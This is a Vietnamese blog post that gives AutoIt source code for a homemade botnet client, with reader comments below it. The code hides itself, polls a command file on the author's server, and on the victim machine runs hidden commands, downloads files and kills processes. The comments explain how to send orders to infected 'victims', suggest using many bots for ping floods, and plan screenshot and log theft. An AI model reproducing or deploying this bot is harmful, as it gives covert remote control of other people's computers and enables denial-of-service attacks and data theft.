[AutoIT] Tự tạo 1 botnet
#include <Process.au3>
#include <INet.au3>
#NoTrayIcon
$txt = "http://thuongtin.net/blog/cmd/data.txt"
$key = ""
While (1)
$con = _INetGetSource($txt)
If $key <> $con Then
; Phan tich va thuc hien lenh
If StringInStr($con, "#", 2) Then
$cmd = StringSplit($con, "#")
If StringInStr($con, "@#", 2) Then
Run($cmd[2], "", @SW_HIDE)
Else
Run($cmd[2])
EndIf
ElseIf StringInStr($con, "$", 2) Then
$cmd = StringSplit($con, "$")
_RunDOS($cmd[2])
ElseIf StringInStr($con, "!", 2) Then
$cmd = StringSplit($con, " ")
InetGet ($cmd[2], $cmd[3], 0, 1)
ElseIf StringInStr($con, "~", 2) Then
$cmd = StringSplit($con, "~")
Run("TASKKILL /F /IM " & $cmd[2] & ".exe", "", @SW_HIDE)
EndIf
$key = $con
EndIf
Sleep(5000)
WEnd
Popularity: 58% [?]
ủa cho code rồi làm sao nữa hả thuongtin
?
http://enhack.net/EnHack-buzz.exe
Đây là link video (nhìn file exe nhưng ko phải virus đâu, cứ tải về mở lên xem là đc)
thanks Thương Tín nhé
Vậy file data.txt nội dung là gì vậy anh?
Chạy link http://thuongtin.net/blog/cmd/data.txt không thấy
File data.txt chứa lệnh thực thi, giả sử máy tính người khác dính con bot trên, bạn ra lệnh:
Bạn chú ý # và phía sau là lệnh command trong cmd đó.
~tenchuongtrinh (ko có .exe) sẽ tắt chương trình đang chạy của vitim, chẳng hạn người bị dính đang chat = YahooMessenger bạn điền lệnh trong data.txt
sẽ tải trang thuong.net về và lưu trong ổ c với tên là data.html (có thể cho tải file thực thi exe khác)
Thanks! Mới xem xong cái exe kia.
Hiểu rồi!
Chúc đông khách nha!
bài viết hay lém cái video của enhack nếu có số lựong boot lớn ta sài lệnh ping thì victim cũng đủ chít roài.tuy không bằng 1 số con botnet irc nhưng như thế này cũng khá ổn !!!
mà thường tín ơi copy vô data aotuit để run ra exe mà nó báo lỗi $txt = “http://thuongtin.net/blog/cmd/data.txt”
$key = “” là sao vâyh ta
code cậu edit nhiều wa lỗi à
Hì! Thông cảm, Wordpress nó không cho viết ký tự ”
Tớ sửa lại rồi, các bạn có thể copy code gốc trong http://xforce.enhack.net/showthread.php?t=147 và xem video botnet đó sẽ hiểu, tớ đang làm con bot khác nè.
Viết mấy thêm mấy lệnh nữa là có chụp hình máy victim, send log, shutdow pc, …
Đã hiểu BotNet là gì, ha ha ha
Code thì đơn giản quá!
Để giống với Cmd thì tớ viết Lệnh# abc -tham_số nhìn dễ hiểu hơn mấy ký tự của bác Thương Tín.
Note: Viết để biết, không có ý định phá ai, he he
Ừa, tớ cũng viết lại con bot chứ đâu có để chạy, không dùng lệnh StringInStr và StringSplit mà dùng so mẫu.
Nhưng code hơi nguy hiểm nên ko dám đưa ra.
mình cũng dang ngâm kíu botnet bằng autoit nhưng dang chập chừng chưa rành cho lắm ^^
Vậy cậu có biết lập trình visual basic ko?
ca’i file cmd.php.chay ok riu.tai sao ma noi dung ko dua vao file data.txt.dang thu dung mobile de control cai pc ma’.co’ j pm wa yahoo nha.thix
Có thể là do host bạn ko CHMOD cho phép nó tạo và ghi file, bạn thử CHMOD thành 777 xem có lỗi ko.
CHMOD là gi?
bạn thử CHMOD thành 777 xem có lỗi ko là làm sao?
Tớ đã tạo 1 file như vậy & tạo thêm file file direc.txt ở cùng địa chỉ trên ổ đĩa cứng rùi dùng fifox chạy file cmd.php gỏ thử vài lệnh nhưng tại sao file data.txt vẫn trống rổng.Theo code thì file đó phải có nội dung gõ tại cmd.php chứ ?Cậu giúp tớ cái.thank nhiều .
Có thể là do permission ko đúng.
Như tớ nói rồi, bạn phải CHMOD thành 777.
Cách CHMOD là dùng Fflahfxp hoặc CuteFTP vào và nhấp phải chuột vào file data.txt chọn CHMOD.
link video hư rùi admin ơi
dien dan enhack dong cua rui !
hj.tớ đả thành công rùi.adm cò thể cho tớ tập hợp lệnh để dk con bot ko?mới bít có 3 lệnh cơ bản thui:run;kill;load.Tới làm để remove cái pc thôi.
em sài các lệnh ok nhưng khi lệnh !http://thuongtin.net C:\data.html thì lại không dc
anh thường tín ơi. Anh giúp em lệnh cmd với, ý của em là: trong threads của process , thường có các threads khác chạy cùng file process của mình, vậy mình dùng lệnh gì kill nó ( TID của PID)